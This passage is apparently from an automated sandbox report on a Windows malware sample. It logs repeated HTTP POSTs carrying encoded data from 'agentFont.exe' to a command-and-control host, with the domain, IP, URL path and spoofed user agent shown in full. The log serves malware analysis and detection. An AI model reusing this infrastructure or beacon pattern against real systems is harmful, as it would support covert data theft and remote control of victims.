                                                                                  Data Ascii: QRXYTKP\Y_[RZSYTUWTXQQ[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._?T%S#>+2=&-/%<10,=65*3?-S>46.!+:&X"#\.
                                                                                  Jan 1, 2025 11:27:51.968502998 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:52.102289915 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.449779185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:52.223356009 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:52.580967903 CET1044OUTData Raw: 51 51 5d 52 51 47 55 58 59 5f 5b 52 5a 52 59 57 55 56 54 5e 51 50 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQ]RQGUXY_[RZRYWUVT^QP[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+"&#<]2==-[/&/%$,5!%32)?^!.%(:&X"#\.
                                                                                  Jan 1, 2025 11:27:52.868182898 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:52.999860048 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.449780185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:53.130549908 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:53.487205982 CET1040OUTData Raw: 54 56 58 58 51 44 50 5a 59 5f 5b 52 5a 5a 59 52 55 51 54 5d 51 5c 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TVXXQDPZY_[RZZYRUQT]Q\[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z(9W#-;2.->41=$Z"_!6"$/>$]6=2<&X"#\.
                                                                                  Jan 1, 2025 11:27:53.788299084 CET25INHTTP/1.1 100 Continue


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.449781185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:53.797086000 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:54.143451929 CET1340OUTData Raw: 51 55 5d 5f 51 46 55 5e 59 5f 5b 52 5a 59 59 56 55 52 54 59 51 5f 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU]_QFU^Y_[RZYYVURTYQ_[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<1*4[8[2=B,-%<!0?6Y669T'=S)+]!1<&X"#\.$
                                                                                  Jan 1, 2025 11:27:54.441412926 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:54.571942091 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 13 29 25 3c 02 24 2b 0c 08 27 10 01 12 2b 30 21 05 2d 3c 0c 00 25 14 3b 06 2b 33 2b 52 3f 15 26 5d 3f 2d 23 04 24 31 37 0d 25 0f 2a 51 00 1c 23 10 28 15 09 12 2b 01 29 09 3d 32 2f 18 29 3f 3b 5a 21 04 38 09 33 02 3e 54 24 03 3f 11 2b 3c 3f 0d 2f 1b 3f 15 2f 0d 02 01 26 36 2f 52 09 14 21 11 29 23 3b 1e 25 54 2d 02 33 23 34 00 20 28 28 0e 23 31 21 51 23 55 20 03 29 3d 30 02 35 0f 26 58 25 5a 3e 07 3c 2d 37 51 22 04 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: ')%<$+'+0!-<%;+3+R?&]?-#$17%*Q#(+)=2/)?;Z!83>T$?+<?/?/&6/R!)#;%T-3#4 ((#1!Q#U )=05&X%Z><-7Q"#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.449782185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:54.167470932 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:54.518378973 CET1044OUTData Raw: 51 51 58 58 54 43 55 5d 59 5f 5b 52 5a 58 59 57 55 5f 54 5c 51 5c 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQXXTCU]Y_[RZXYWU_T\Q\[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+!"#[(X&*@-[+R%Y!',!59Q',!P+4?^#-1_+*&X"#\.
                                                                                  Jan 1, 2025 11:27:54.832112074 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:54.967744112 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.449784185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:55.098712921 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:55.455842018 CET1044OUTData Raw: 54 53 58 5b 54 4a 55 59 59 5f 5b 52 5a 5e 59 51 55 52 54 5f 51 5d 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX[TJUYY_[RZ^YQURT_Q][Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?& 2.A-V110?965!U%<=P=$$".6<:&X"#\.8
                                                                                  Jan 1, 2025 11:27:55.735786915 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:55.870141983 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.449785185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:56.002521992 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:56.346503019 CET1044OUTData Raw: 54 53 58 59 51 41 55 5f 59 5f 5b 52 5a 5b 59 55 55 51 54 5d 51 5c 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSXYQAU_Y_[RZ[YUUQT]Q\[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?1>7#$.*-=$%<23.66=P3<1*]5+*&X"#\.,
                                                                                  Jan 1, 2025 11:27:56.647931099 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:56.779812098 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.449786185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:56.939465046 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:57.283953905 CET1040OUTData Raw: 54 50 5d 52 54 43 55 5a 59 5f 5b 52 5a 5a 59 56 55 56 54 59 51 58 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]RTCUZY_[RZZYVUVTYQX[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+5 =\&>=,=2.$.[#%&0/1S=']5[6+:&X"#\.$
                                                                                  Jan 1, 2025 11:27:57.580790043 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:57.706178904 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.449788185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:57.837312937 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:58.190468073 CET1044OUTData Raw: 54 55 5d 5e 54 44 55 5f 59 5f 5b 52 5a 5b 59 57 55 5e 54 51 51 5b 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU]^TDU_Y_[RZ[YWU^TQQ[[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+.#(&!--(%*X3?>^#%Q3*>';[6-9(:&X"#\.,
                                                                                  Jan 1, 2025 11:27:58.494329929 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:58.626174927 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.449794185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:58.778037071 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:59.127747059 CET1040OUTData Raw: 54 57 5d 59 51 40 55 58 59 5f 5b 52 5a 5a 59 51 55 5e 54 5c 51 5d 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TW]YQ@UXY_[RZZYQU^T\Q][^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.()T Y$.%-[3W&%$9"C-0?*B'".)+&X"#\.8
                                                                                  Jan 1, 2025 11:27:59.415129900 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:59.542102098 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.449800185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:59.586780071 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1312
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.449804185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:59.661644936 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:00.018343925 CET1044OUTData Raw: 51 50 58 58 54 41 50 59 59 5f 5b 52 5a 5e 59 5c 55 52 54 5c 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QPXXTAPYY_[RZ^Y\URT\Q_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-("# &[:9-V2Y"X',!-31)4"5(&X"#\.8
                                                                                  Jan 1, 2025 11:28:00.318223953 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:00.450110912 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.2.449812185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:00.589643002 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:00.940228939 CET1044OUTData Raw: 51 57 5d 52 51 44 50 5d 59 5f 5b 52 5a 53 59 5c 55 54 54 5f 51 5d 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]RQDP]Y_[RZSY\UTT_Q][Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+29W#>#&.%97V&=3>!%"3-Q)8".><*&X"#\.
                                                                                  Jan 1, 2025 11:28:01.246711969 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:01.382337093 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.2.449813185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:01.726061106 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:02.080873966 CET1044OUTData Raw: 54 5b 5d 53 51 41 50 5a 59 5f 5b 52 5a 58 59 50 55 51 54 5e 51 5e 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]SQAPZY_[RZXYPUQT^Q^[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(9R7=+1-):=R2&0,Y"C:'6+'3^">6?&X"#\.
                                                                                  Jan 1, 2025 11:28:02.380166054 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:02.513839960 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.2.449824185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:02.646120071 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:03.003289938 CET1044OUTData Raw: 54 55 5d 52 54 43 50 5a 59 5f 5b 52 5a 5b 59 53 55 55 54 5a 51 5d 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU]RTCPZY_[RZ[YSUUTZQ][X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._+")"=$2&A,.;&/%',669$Y1R*;!."+&X"#\.,
                                                                                  Jan 1, 2025 11:28:03.310502052 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:03.476268053 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.2.449830185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
